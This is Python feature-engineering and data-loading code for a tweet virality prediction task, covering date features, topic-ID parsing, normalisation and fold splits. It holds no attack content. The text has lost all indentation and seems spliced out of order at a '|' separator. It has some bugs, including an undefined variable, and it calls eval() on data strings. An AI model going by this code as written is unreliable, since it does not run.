hour_sine = np.sin(2 * np.pi * df['tweet_created_at_hour'] / 24.0)
hour_sine.name = 'sin_hour'
hour_cosine = np.cos(2 * np.pi * df['tweet_created_at_hour'] / 24.0)
hour_cosine.name = 'cos_hour'
df = df.join([hour_sine, hour_cosine])
return df
def add_dummy_dates(df):
year = pd.get_dummies(df.tweet_created_at_year, prefix='ohe_year')
month = pd.get_dummies(df.tweet_created_at_month, prefix='ohe_month')
day = pd.get_dummies(df.tweet_created_at_day, prefix='ohe_day')
user_year = pd.get_dummies(df.user_created_at_year, prefix='ohe_user_year')
user_month = pd.get_dummies(df.user_created_at_month, prefix='ohe_user_month')
df = df.join([year, month, day, user_year, user_month])
return df
def add_date_feats(df):
# todo OHE date
# todo to sin, cos(date)
#df_old_index = df.index
df = create_date_col(df)
df = add_sincos(df)
df = add_dummy_dates(df)
cols_resample = ['tweet_hashtag_count', 'tweet_url_count', 'tweet_mention_count',
]
date_freqs = ['1Q'] # ,'1M']
# todo DON't use _func_min if does not affect CV (low feat importance)
stats = ['sum','mean','std','max'] # ['mean', 'max', 'min', 'median', 'std']
for freq_ in date_freqs:
for stat_ in stats:
df.set_index('date', inplace=True)
g = (df.groupby('tweet_user_id').resample(freq_, closed='left')
[cols_resample].agg(stat_)
.astype(np.float32)
) # .set_index('date'))
g = g.unstack('date').fillna(0)
g.columns = [col1 + f'_func_{stat_}_' + col2.strftime('%Y-%m-%d') for (col1, col2) in g.columns]
g.reset_index(inplace=True)
# g = g.rename(columns ={col: f"{col}_rsmpl_{freq_}_func_{stat_}"
# for col in g.columns if col not in ['tweet_user_id','date']})
#df = df.reset_index().merge(g, how='left', on='tweet_user_id')
df = df.reset_index().merge(g, how='left', on='tweet_user_id')
# df.reset_index(drop=False, inplace=True)
# todo count 'tweet_id' for each period for user
today = pd.to_datetime('7/1/2021')
df['days_since_tweet'] = (today - df['date']).dt.days # .astype(int)
df['user_followers_count_2days'] = df['user_followers_count'] / df['days_since_tweet']
df['user_following_count_2days'] = df['user_following_count'] / df['days_since_tweet']
df['user_listed_on_count_2days'] = df['user_listed_on_count'] / df['days_since_tweet']
df['user_tweet_count_2days'] = df['user_tweet_count'] / df['days_since_tweet']
df['tweet_hashtag_count_2days'] = df['tweet_hashtag_count'] / df['days_since_tweet']
df['tweet_mention_count_2days'] = df['tweet_mention_count'] / df['days_since_tweet']
df['tweet_url_count_2days'] = df['tweet_url_count'] / df['days_since_tweet']
# todo not a date related functions:
df['tweet_mention_count_div_followers'] = df['tweet_mention_count'].divide(df['user_followers_count']+1)
df['tweet_url_count_div_followers'] = df['tweet_url_count'].divide(df['user_followers_count']+1)
df['tweet_hashtag_count_div_followers'] = df['tweet_hashtag_count'].divide(df['user_followers_count']+1)
df['tweet_mention_count_div_followers'] = df['tweet_mention_count'].divide(df['user_followers_count']+1)
df['tweet_mention_count_div_n_tweets'] = df['tweet_mention_count'].divide(df['user_tweet_count']+1)
df['tweet_url_count_div_n_tweets'] = df['tweet_url_count'].divide(df['user_tweet_count']+1)
df['tweet_hashtag_count_div_n_tweets'] = df['tweet_hashtag_count'].divide(df['user_tweet_count']+1)
df['tweet_mention_count_div_n_tweets'] = df['tweet_mention_count'].divide(df['user_tweet_count']+1)
df['tweet_mention_count_div_likes'] = df['tweet_mention_count'].divide(df['user_like_count']+1)
df['tweet_url_count_div_likes'] = df['tweet_url_count'].divide(df['user_like_count']+1)
df['tweet_hashtag_count_div_likes'] = df['tweet_hashtag_count'].divide(df['user_like_count']+1)
df['tweet_mention_count_div_likes'] = df['tweet_mention_count'].divide(df['user_like_count']+1)
cols_drop = ['date', 'tweet_created_at_year', 'tweet_created_at_month',
'tweet_created_at_day',
'user_created_at_year', 'user_created_at_month']
df.drop(cols_drop, axis=1, inplace=True)
return df
def ohe_func(df, cat_col, ohe_tfm=LabelBinarizer(), prefix=None):
""" OHE one categorical column of df, and return df with columns 'label_{range(1,x}' added
"""
# ohe.iloc[:, df['tweet_language_id'].tolist()]
ohe_tfm.fit(df[cat_col])
ohe_transformed = ohe_tfm.transform(df[cat_col])
if prefix:
cat_cols = [f'{prefix}_{cat_col}_{i}' for i in range(ohe_transformed.shape[1])]
else:
cat_cols = [f'{cat_col}_{i}' for i in range(ohe_transformed.shape[1])]
ohe_df = pd.DataFrame(ohe_transformed, index=df.index, columns=cat_cols)
df = pd.concat([df, ohe_df], axis=1)
df.drop(cat_col, axis=1, inplace=True)
return df
def drop_unnecessary_cols(cfg, df):
cols_drop = [] # 'tweet_created_at_year', 'tweet_created_at_month',
# 'tweet_created_at_day']
# 'days_since_user', 'user_created_at_year', 'user_created_at_month',
# 'user_verified', 'user_has_url']
if cfg.drop_rare_ohe_language_ids and cfg.one_hot_encode:
lang_leave_ids = [0, 1, 3]
cols_drop += [f'tweet_language_id_{i}' for i in range(31)
if i not in lang_leave_ids
]
for col in cols_drop:
if col in df.columns:
df.drop(col, axis=1, inplace=True)
# print(f"Dropped col: {col}")
return df
class Features():
def __init__(self,):
self.transformers = {}
self.impute_img_feature_nulls = -1
self.media_img_feat_cols = []
self.text_feat_cols = []
self.user_des_feat_cols = []
self.user_img_feat_cols = []
# union of topic ids in train and test , 0 - nan value, min=36, max=172
# xor train, test = [ 38, 117, 123, 165]
# in test but not in train = [ 38, 117, 123]
self.unique_topic_ids = [ 0, 36, 37, 38, 39, 43, 44, 45, 52, 58, 59, 60, 61,
63, 68, 71, 72, 73, 78, 79, 80, 81, 82, 87, 88, 89,
91, 93, 98, 99, 100, 101, 104, 111, 112, 117, 118, 119, 120,
121, 122, 123, 125, 126, 127, 147, 148, 149, 150, 151, 152, 153,
155, 156, 163, 165, 169, 170, 171, 172]
self.cols2int8 = ['fold', 'user_created_at_month', 'tweet_created_at_day', 'tweet_created_at_hour',
'tweet_hashtag_count', 'tweet_url_count', 'tweet_mention_count', 'tweet_has_attachment',
'virality', 'tweet_has_media', 'user_has_url', 'user_verified', 'num_media',
'user_id', 'tweet_user_id']
# 'tweet_created_at_year', 'user_created_at_year',
self.cols2int8 += [f'tweet_language_id_{i}' for i in range(30)]
def get_data_stage1(self, cfg, base_dir, n_samples=int(1e10)):
df = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets.csv'), nrows=n_samples)
test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets.csv'), nrows=n_samples)
# test_tweet_ids = test['tweet_id'].to_list()
# self.tabular_feats.append()
df = pd.concat([df, test])
del test; _ = gc.collect()
df = change2float32(df)
df = self.optimize_ints(df)
#df.drop('tweet_attachment_class', axis=1, inplace=True)
# try using 'media_id' columns
df_media = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets_vectorized_media.csv'))
df_media_test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets_vectorized_media.csv'))
df_media = pd.concat([df_media, df_media_test])
df_media = change2float32(df_media)
df = merge_df2media(df, df_media)
del df_media, df_media_test; _ = gc.collect()
df_text = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets_vectorized_text.csv'))
df_text_test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets_vectorized_text.csv'))
df_text = pd.concat([df_text, df_text_test])
text_feat_cols = ['text_'+ col for col in df_text.columns if col.startswith('feature_')]
df_text.columns = ['tweet_id'] + text_feat_cols
df_text.loc[:, text_feat_cols] = np.log(df_text[text_feat_cols] + 13)
df_text = change2float32(df_text)
df = df.merge(df_text, how='left', on='tweet_id')
del df_text, df_text_test; _ = gc.collect()
users = pd.read_csv(osj(base_dir, 'Users','users.csv'))
# log of _count feats
users_des = pd.read_csv(osj(base_dir, 'Users','user_vectorized_descriptions.csv'))
# for col in ['tweet_hashtag_count','tweet_url_count','tweet_mention_count']:
# users[col] = users[col].astype(int)
users_img = pd.read_csv(osj(base_dir, 'Users','user_vectorized_profile_images.csv'))
user_des_feat_cols = ['user_des_'+col for col in users_des.columns if col.startswith('feature')]
users_des.columns = ['user_id'] + user_des_feat_cols
user_img_feat_cols = ['user_img_'+col for col in users_img.columns if col.startswith('feature')]
users_img.columns = ['user_id'] + user_img_feat_cols
# user_data = users # .merge(users, how='left', on='user_id')
user_data = users.merge(users_des, how='left', on='user_id')
user_data = user_data.merge(users_img, how='left', on='user_id')
user_data = change2float32(user_data)
user_data = self.optimize_ints(user_data) # # no nulls in user_data 25-may
df = df.merge(user_data, how='left', left_on='tweet_user_id', right_on='user_id')
df.drop('user_id', axis=1, inplace=True)
df = cond_drop_imgtext(cfg, df)
# df = add_num_media_user(df)
del users_des, users_img, user_data;
_ = gc.collect()
return df # , test_tweet_ids
def get_data_stage2(self, cfg, df):
df = tweets_user_created_date(df) # add feats: number of user tweets in time period (year, month, day, hour)
df = add_date_feats(df)
df = bin_feats(df, feats=['tweet_mention_count','user_tweet_count',
'user_followers_count','user_following_count',
'user_listed_on_count'])
df = add_topic_count(df)
df = add_topic_ids(df)
bool_cols = df.select_dtypes(include='bool').columns
df[bool_cols] = df[bool_cols].astype(np.int8)
if cfg.one_hot_encode:
df = ohe_func(df, cat_col='tweet_language_id', ohe_tfm=LabelBinarizer())
df = ohe_func(df, cat_col='tweet_attachment_class', ohe_tfm=LabelBinarizer())
else:
df['tweet_attachment_class'] = df['tweet_attachment_class'].astype('category').cat.codes
# df = to_binary_categories(df, cat_col='tweet_language_id')
media_img_feat_cols = [col for col in df.columns if col.startswith('img_feature_')]
if cfg.impute_nulls:
df.loc[:,media_img_feat_cols] = df[media_img_feat_cols].fillna(self.impute_img_feature_nulls)
if cfg.add_user_virality:
df = self.add_virality_feature(df)
df = freq_encoding(df, freq_cols=['tweet_user_id'], main_col='tweet_id')
df = drop_unnecessary_cols(cfg, df)
# log (feats) :
cols2log = ['user_like_count','user_followers_count',
'user_following_count', 'user_listed_on_count',
'user_tweet_count']
# 'tweet_hashtag_count' , 'tweet_url_count', 'tweet_mention_count'
cols2log = [col for col in df.columns if col in cols2log]
df = logtransform(df, cols2log)
# print("df.shape after merging all csv files:", df.shape)
# print("df.dtypes.value_counts():\n", df.dtypes.value_counts())
# train = df[~df['tweet_id'].isin(test_tweet_ids)]
# test = df[df['tweet_id'].isin(test_tweet_ids)]
train = df[~df['virality'].isnull()]
test = df[df['virality'].isnull()]
del test['virality']; _ = gc.collect()
print(f"train.shape = {train.shape}, test.shape = {test.shape}")
return train, test
# end of def get_data
def add_virality_feature(self, df):
df_train = df[~df['virality'].isnull()]
viral_user = df_train.groupby('tweet_user_id')['virality'].mean().reset_index()
viral_user.columns = ['tweet_user_id', 'user_virality']
df = df.merge(viral_user, how='left', on='tweet_user_id')
return df
def optimize_ints(self, df):
int8_candidates = self.cols2int8
# for col in ['tweet_created_at_year', 'user_created_at_year']:
# if col in df.columns:
# df.loc[:, col] = df.loc[:, col] - 2000
# df.loc[:, col] = df.loc[:, col].astype(np.int8)
for col in int8_candidates:
if (col in df.columns) and (df[col].isnull().sum()==0):
df.loc[:, col] = df.loc[:, col].astype(np.int8)
return df
# end of class Features
def logtransform(df, cols2log):
df.loc[:, cols2log] = np.log(df[cols2log] + 2)
return df
class NormalizeFeats_Parallel():
""" https://scikit-learn.org/stable/computing/parallelism.html
from joblib import parallel_backend
with parallel_backend('threading', n_jobs=2):
# Your scikit-learn code here
"""
def __init__(self, feat_cols: list):
self.feat_cols = feat_cols
self.scalers_dict = {}
def normalize_data(self, df, mode='train', scaler=StandardScaler()):
if mode =='train':
for col in self.feat_cols:
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(df[col].values.reshape(-1,1))
self.scalers_dict[col] = scaler
# scaler.fit(df[feat_cols].values)
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
else:
for col in self.feat_cols:
with parallel_backend('threading', n_jobs=n_cpus):
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
return df
# end of NormalizeFeats class
class NormalizeFeats():
def __init__(self, feat_cols: list):
self.feat_cols = feat_cols
self.scalers_dict = {}
def normalize_data(self, df, mode='train', scaler=StandardScaler()):
if mode =='train':
for col in self.feat_cols:
scaler.fit(df[col].values.reshape(-1,1))
self.scalers_dict[col] = scaler
# scaler.fit(df[feat_cols].values)
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
else:
for col in self.feat_cols:
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
return df
# end of NormalizeFeats class
def transform_joint(train, test=None, norm_cols=None, tfm = StandardScaler()):
# normalize joint train test data in chunks by columns
l_train = len(train)
if len(norm_cols) < 1000:
if isinstance(test, pd.DataFrame):
assert train[norm_cols].columns.equals(test[norm_cols].columns)
data = pd.concat([train[norm_cols], test[norm_cols]]).values
else:
data = train[norm_cols].values
with parallel_backend('threading', n_jobs=n_cpus):
tfm.fit(data)
data = tfm.transform(data)
train.loc[:, norm_cols] = data[:l_train]
if isinstance(test, pd.DataFrame):
test.loc[:, norm_cols] = data[l_train:]
else: # len(norm_cols) >= 1000
all_col_chunks = [norm_cols[i:i+1000] for i in range(0, len(norm_cols), 1000)]
for cols_chunk in all_col_chunks:
if isinstance(test, pd.DataFrame):
assert train[norm_cols].columns.equals(test[norm_cols].columns)
data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
else:
data_chunk = train[cols_chunk]
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
tfm.fit(data_chunk)
data_chunk = tfm.transform(data_chunk)
train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
if isinstance(test, pd.DataFrame):
test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
return train, test # test cab be None
def normalize_npnan(train, test=None, norm_cols=[]):
if len(norm_cols)==0:
raise NotImplementedError
l_train = len(train)
if len(norm_cols) < 1000:
if isinstance(test, pd.DataFrame):
# assert train[norm_cols].columns.equals(test[norm_cols].columns)
data = pd.concat([train[norm_cols], test[norm_cols]]).values
else:
data = train[norm_cols].values
data = (data - np.nanmean(data, axis=0))/np.nanstd(data, axis=0)
train.loc[:, norm_cols] = data[:l_train]
if isinstance(test, pd.DataFrame):
test.loc[:, norm_cols] = data[l_train:]
else: # len(norm_cols) >= 1000
all_col_chunks = [norm_cols[i:i + 1000] for i in range(0, len(norm_cols), 1000)]
for cols_chunk in all_col_chunks:
if isinstance(test, pd.DataFrame):
# assert train[norm_cols].columns.equals(test[norm_cols].columns)
data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
else:
data_chunk = train[cols_chunk]
data_chunk = (data_chunk - np.nanmean(data_chunk, axis=0))/np.nanstd(data_chunk, axis=0)
train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
if isinstance(test, pd.DataFrame):
test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
return train, test # test cab be None
def normalize_joint(train, test=None, norm_cols=None):
# normalize joint train test data in chunks by columns
l_train = len(train)
if len(norm_cols) < 1000:
if isinstance(test, pd.DataFrame):
assert train[norm_cols].columns.equals(test[norm_cols].columns)
data = pd.concat([train[norm_cols], test[norm_cols]]).values
else:
data = train[norm_cols].values
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(data)
data = scaler.transform(data)
train.loc[:, norm_cols] = data[:l_train]
if isinstance(test, pd.DataFrame):
test.loc[:, norm_cols] = data[l_train:]
else: # len(norm_cols) >= 1000
all_col_chunks = [norm_cols[i:i+1000] for i in range(0, len(norm_cols), 1000)]
for cols_chunk in all_col_chunks:
if isinstance(test, pd.DataFrame):
assert train[norm_cols].columns.equals(test[norm_cols].columns)
data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
else:
data_chunk = train[cols_chunk]
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(data_chunk)
data_chunk = scaler.transform(data_chunk)
train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
if isinstance(test, pd.DataFrame):
test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
return train, test # test cab be None
def normalize_joint_parallel(train, test, norm_cols, num_workers=6):
# normalize joint train test data in chunks by columns
from joblib import Parallel, delayed
l_train = len(train)
assert train[norm_cols].columns.equals(test[norm_cols].columns)
if len(norm_cols) < 1000:
data = pd.concat([train[norm_cols], test[norm_cols]]).values
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(data)
data = scaler.transform(data)
train.loc[:, norm_cols] = data[:l_train]
test.loc[:, norm_cols] = data[l_train:]
else: # len(norm_cols) >= 1000
all_col_chunks = [norm_cols[i:i+1000] for i in range(0, len(norm_cols), 1000)]
for cols_chunk in all_col_chunks:
data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(data_chunk)
data_chunk = scaler.transform(data_chunk)
train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
return train, test
def split2folds_user_viral(df, n_folds, seed_folds, label_cols=None, foldnum_col='fold'):
# df is added foldnum_col='fold' column based on KFoldMethod = StratifiedKFold class
# applied to label_col='label' column
temp_col = label_cols[0] + "_" + label_cols[1]
df[temp_col] = df[label_cols[0]].astype(str) + "_" + df[label_cols[1]].astype(str)
df[temp_col] =df[temp_col].astype('category')
skf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
df[foldnum_col] = np.nan
for fold, (train_idx, val_idx) in enumerate(skf.split(np.zeros(df.shape[0]), df[temp_col])):
df.iloc[val_idx, df.columns.get_loc(foldnum_col)] = fold
df[foldnum_col] = df[foldnum_col].astype(int)
# assert df.isnull().sum().sum() == 0, "Error: null values in df"
del df[temp_col]
return df
def split2folds_viral_only(df, n_folds, seed_folds, label_col='label', foldnum_col='fold'):
# df is added foldnum_col='fold' column based on KFoldMethod = StratifiedKFold class
# applied to label_col='label' column
skf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
df[foldnum_col] = np.nan
for fold, (train_idx, val_idx) in enumerate(skf.split(df.values[:,:1], df[label_col])):
df.iloc[val_idx, df.columns.get_loc(foldnum_col)] = fold
df[foldnum_col] = df[foldnum_col].astype(int)
# assert df.isnull().sum().sum() == 0, "Error: null values in df"
return df
def split2folds_simple(df, n_folds, seed_folds, foldnum_col='fold'):
# df is added foldnum_col='fold' column based on KFoldMethod = StratifiedKFold class
# applied to label_col='label' column
skf = KFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
df[foldnum_col] = np.nan
for fold, (train_idx, val_idx) in enumerate(skf.split(df.values[:,:1])):
df.iloc[val_idx, df.columns.get_loc(foldnum_col)] = fold
df[foldnum_col] = df[foldnum_col].astype(int)
# assert df.isnull().sum().sum() == 0, "Error: null values in df"
return df
def get_folds(cfg, train, default_seed_folds=24):
# if cfg.seed_folds == default_seed_folds:
# folds = pd.read_csv(cfg.folds_split_path)
# if 'fold' in train.columns:
# del train['fold']
# train = train.merge(folds, how='left', on='tweet_id')
# train.dropna(0, subset=['fold'], inplace=True)
# else:
if cfg.folds_split_method == 'user_viral':
train = split2folds_user_viral(train, cfg.n_folds, cfg.seed_folds,
label_cols=['tweet_user_id', 'virality'], foldnum_col='fold')
return train
def get_feat_cols(train):
feat_cols = [col for col in train.columns if (col not in ['virality', 'tweet_id',
'fold','is_test'])
and not col.startswith('target_')]
media_img_feat_cols = [col for col in train.columns if col.startswith('img_feature')]
text_feat_cols = [col for col in train.columns if col.startswith('text_feature')]
user_des_feat_cols = [col for col in train.columns if col.startswith('user_des_feature')]
user_img_feat_cols = [col for col in train.columns if col.startswith('user_img_feature')]
feats_some = [col for col in feat_cols if not col in media_img_feat_cols +
text_feat_cols + user_img_feat_cols + user_des_feat_cols]
# print(f"Null values:\n{train[feat_cols].isnull().sum().sort_values(ascending=False).head(2)}")
return (feat_cols, media_img_feat_cols, text_feat_cols,
user_des_feat_cols, user_img_feat_cols, feats_some)
def cond_drop_imgtext(cfg, df):
(feat_cols, media_img_feat_cols, text_feat_cols,
user_des_feat_cols, user_img_feat_cols, feats_some) = get_feat_cols(df)
if cfg.drop_media_img_feats:
df.drop(media_img_feat_cols, axis=1, inplace=True)
if cfg.drop_text_feats:
df.drop(text_feat_cols, axis=1, inplace=True)
if cfg.drop_user_des_feats:
df.drop(user_des_feat_cols, axis=1, inplace=True)
if cfg.drop_user_img_feats:
df.drop(user_img_feat_cols, axis=1, inplace=True)
return df
def add_topic_count(df):
# and drop the column
nan_replace = '0'
topics = df['tweet_topic_ids'].fillna(f'[{nan_replace}]')
# topics_xnan = train['tweet_topic_ids'].dropna()
# fill_value = topicsx_xnan.apply(lambda x: len(eval(x))).mean()
# fill_value = topicx_xnan.apply(lambda x: len(eval(x))).median()
n_topics = topics.apply(lambda x: len(eval(x)))
n_topics_mean = n_topics.mean()
n_topics = np.where(topics == nan_replace, n_topics_mean, n_topics)
df['n_topics'] = n_topics.astype(int)
return df
def add_topic_ids(df):
df.fillna({'tweet_topic_ids': "['0']"}, inplace=True)
topic_ids = (
df['tweet_topic_ids'].str.strip('[]').str.split('\s*,\s*').explode()
.str.get_dummies().sum(level=0).add_prefix('topic_id_')
)
topic_ids.rename(columns=lambda x: x.replace("'", ""), inplace=True)
if 'tweet_topic_ids' in df.columns:
df.drop('tweet_topic_ids', 1)
df = df.join(topic_ids) # , how='left', on='tweet_id')
for col_ in topic_ids.columns:
if df[col_].max() > 1:
df[f"{col_}_hthan1_binary"] = (df[col_] > 0).astype(np.int8)
df.drop('tweet_topic_ids',1, inplace=True)
return df
#
# def replace_add_new_topic_ids(train, test):
# # add topic_id cols (57) with number of times the topic is in the sample
# # add _binary cols (45) where =1 if topic_id is more than once
# old_topic_id_cols = [col for col in train.columns if 'topic_id' in col]
# print(f"old_topic_id_cols: {old_topic_id_cols}")
# len_train = train.shape[0]
# train = pd.concat([train, test]).reset_index(drop=True)
# del test;
# _ = gc.collect()
# train.drop(old_topic_id_cols, axis=1, inplace=True)
# train, new_topic_id_cols = add_new_topic_ids(base_dir, train, df_name='train_test')
# # todo cols ['topic_id_117' 'topic_id_123' 'topic_id_38'] are not in new_topic_id_cols
# # done: only one sample==1 for each topic_id_117 topic_id_123 topic_id_38 [0 42274 42274 42274] [1 1 1 1]
# for col_ in new_topic_id_cols:
# if train[col_].max() > 1:
# train[f"{col_}_hthan1_binary"] = (train[col_] > 0).astype(np.int8)
# # train.drop(col_, axis=1, inplace=True)
# test = train.iloc[len_train:, :].reset_index(drop=True)
# train = train.iloc[:len_train, :]
# return train, test
def extract_feats_media_text(df):
# todo extact_feats_media_text
# Set the target as well as dependent variables from image data.
y = vectorized_media_df['virality']
x = vectorized_media_df.loc[:, vectorized_media_df.columns.str.contains("img_")]
# Run Lasso regression for feature selection.
sel_model = SelectFromModel(LogisticRegression(C=1, penalty='l1', solver='liblinear'))
# time the model fitting
start = timeit.default_timer()
# Fit the trained model on our data
sel_model.fit(x, y)
stop = timeit.default_timer()
print('Time: ', stop - start)
# get index of good features
sel_index = sel_model.get_support()
# count the no of columns selected
counter = collections.Counter(sel_model.get_support())
print(counter)
def save_preprocessed(cfg, train, test, path_train, path_test):
# p_train = cfg.train_preprocessed_path
# p_test = cfg.test_preprocessed_path
# if cfg.debug:
# path_train = osj(os.path.dirname(p_train), 'debug_' + os.path.basename(path_train))
# path_test = osj(os.path.dirname(p_test), 'debug_' + os.path.basename(path_test))
assert not os.path.isfile(path_train), f"WON'T OVERWRITE/SAVE: file exists {os.path.basename(path_train)}"
assert not os.path.isfile(path_test), f"WON'T OVERWRITE/SAVE: file exists {os.path.basename(path_test)}"
train.to_csv(path_train, index=False)
test.to_csv(path_test, index=False)
def get_raw_train_tweet_cols(df):
# get cols from train_tweets.csv and users.csv
init_tweets_cols = ['tweet_id', 'tweet_user_id', 'tweet_created_at_year',
'tweet_created_at_month', 'tweet_created_at_day',
'tweet_created_at_hour', 'tweet_hashtag_count', 'tweet_url_count',
'tweet_mention_count', 'tweet_has_attachment', 'tweet_attachment_class',
'tweet_language_id', 'tweet_topic_ids', 'virality']
init_users_cols = ['user_id', 'user_like_count', 'user_followers_count',
'user_following_count', 'user_listed_on_count', 'user_has_location',
'user_tweet_count', 'user_has_url', 'user_verified',
'user_created_at_year', 'user_created_at_month']
def add_new_topic_ids(base_dir, df, df_name='train'):
if df_name=='train_test':
df_tweets = pd.read_csv(osj(base_dir, 'Tweets', f'train_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets_test = pd.read_csv(osj(base_dir, 'Tweets', f'test_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets = pd.concat([df_tweets, df_tweets_test]).reset_index(drop=True)
# df_tweets = df.reindex(df.index)
else:
df_tweets = pd.read_csv(osj(base_dir, 'Tweets', f'{df_name}_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets.fillna({'tweet_topic_ids': "['0']"}, inplace=True)
topic_ids = (
df_tweets['tweet_topic_ids'].str.strip('[]').str.split('\s*,\s*').explode()
.str.get_dummies().sum(level=0).add_prefix('topic_id_')
)
topic_ids.rename(columns=lambda x: x.replace("'", ""), inplace=True)
topic_ids['tweet_id'] = df_tweets['tweet_id']
if 'tweet_topic_ids' in df.columns:
df.drop('tweet_topic_ids')
df = df.merge(topic_ids, how='left', on='tweet_id')
return df, list(topic_ids.columns)
| import numpy as np
import pandas as pd
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import StratifiedKFold
from sklearn.preprocessing import StandardScaler
from joblib import parallel_backend
from multiprocessing import cpu_count
import os, gc, joblib
from tqdm import tqdm
from collections import defaultdict
import torch
import warnings
warnings.filterwarnings('ignore')
pd.set_option("display.max_colwidth", 100)
pd.set_option("display.max_rows", 20)
osj = os.path.join; osl = os.listdir
n_cpus = cpu_count()
class ViralDataset(torch.utils.data.Dataset):
def __init__(self, df: pd.DataFrame, feat_cols: list, mode: str):
self.X = df[feat_cols].values # [:,np.newaxis,:]
self.mode = mode
if mode != 'test':
self.targets = df['virality'].values # [:,np.newaxis] # - 1
# assert np.sum(~df['virality'].isin(list(range(5))))==0
def __len__(self):
return len(self.X)
def __getitem__(self, idx):
if self.mode=='test':
return torch.tensor(self.X[idx], dtype=torch.float32)
else:
return (torch.tensor(self.X[idx], dtype=torch.float32),
torch.tensor(self.targets[idx], dtype=torch.long)) # long))
class ExtractFeatsDataset(torch.utils.data.Dataset):
def __init__(self, df: pd.DataFrame, feat_cols: list, target_cols: list, mode: str):
self.X = df[feat_cols].values # [:,np.newaxis,:]
# self.target_cols = target_cols
self.mode = mode
if mode != 'test':
if len(target_cols)==1:
self.targets = df[target_cols[0]].values # [:,np.newaxis] # - 1
self.target_dtype = torch.long
else:
self.targets = df[target_cols].values # [:,np.newaxis] # - 1
self.target_dtype = torch.float32
# assert np.sum(~df['virality'].isin(list(range(5))))==0
def __len__(self):
return len(self.X)
def __getitem__(self, idx):
if self.mode=='test':
return torch.tensor(self.X[idx], dtype=torch.float32)
else:
return (torch.tensor(self.X[idx], dtype=torch.float32),
torch.tensor(self.targets[idx], dtype=self.target_dtype)) # long))
def to_binary_categories(df, cat_col='tweet_language_id'):
df.loc[:, cat_col] = (df[cat_col]!=0).astype(np.int8)
return df
def freq_encoding(df, freq_cols: list, main_col='tweet_id'):
for c in freq_cols:
count_df = df.groupby([c])[main_col].count().reset_index()
count_df.columns = [c, '{}_freq'.format(c)]
df = df.merge(count_df, how='left', on=c)
return df
def bin_feats(df, feats=[], n_bins_default=20):
bin_counts = defaultdict(lambda: n_bins_default)
bin_counts['user_tweet_count'] = 20
for feature in feats:
if '_binned' in feature:
continue
n_bins = bin_counts[feature]
if n_bins:
bins = np.unique(df[feature].quantile(np.linspace(0, 1, n_bins)).values)
df[feature + '_binned'] = pd.cut(
df[feature], bins=bins, duplicates='drop'
).cat.codes
return df
def to_categorical(df):
cat_cols = ['tweet_has_attachment', 'user_has_location', 'user_has_url', 'user_verified', ]
df[cat_cols] = df[cat_cols].astype('category')
return df
def change2float32(df):
float_cols = df.select_dtypes('float64').columns
df[float_cols] = df[float_cols].astype(np.float32)
return df
def merge_df2media(df, df_media):
num_media = (df_media.groupby('tweet_id')['media_id']
.nunique()
.reset_index())
df_media.drop('media_id', axis=1, inplace=True)
num_media.columns = ['tweet_id', 'num_media']
df_media = df_media.merge(num_media, how='left', on='tweet_id')
media_cols = [col for col in df_media if col not in ['tweet_id','media_id']]
df_media = df_media.groupby('tweet_id')[media_cols].mean().reset_index()
# df_media = mean_feats.merge(df_media[['tweet_id']], how='left', on='tweet_id')
# del mean_feats; _ = gc.collect()
df_media['tweet_has_media'] = True
df = df.merge(df_media, how='left', on='tweet_id')
# fillna False if tweet has no media
df['tweet_has_media'] = df['tweet_has_media'].fillna(False)
# the same for the count of number of media per tweet
df['num_media'] = df['num_media'].fillna(0).astype(np.int8)
return df
# def add_num_media_user(df):
# # todo when not debug: df['num_media'].equals(df['num_media_user'])
# num_media_user = df.groupby('tweet_id')['num_media'].sum().reset_index()
# num_media_user.columns = ['tweet_id','num_media_user']
# df = df.merge(num_media_user, how='left', on='tweet_id')
# df['num_media_user'] = df['num_media_user'].astype(np.int8)
# return df
def tweets_user_created_date(df):
for feat_ in ['tweet_created_at_year', 'tweet_created_at_month', 'tweet_created_at_day',
'tweet_created_at_hour']:
# counts_df_cols = ['tweet_user_id']+[f"tweets_in_{feat_.split('_')[-1]}_{time_}" for time_ in np.sort(df[feat_].unique())]
# tweet_user_ids = np.sort(df['tweet_user_id'].unique())
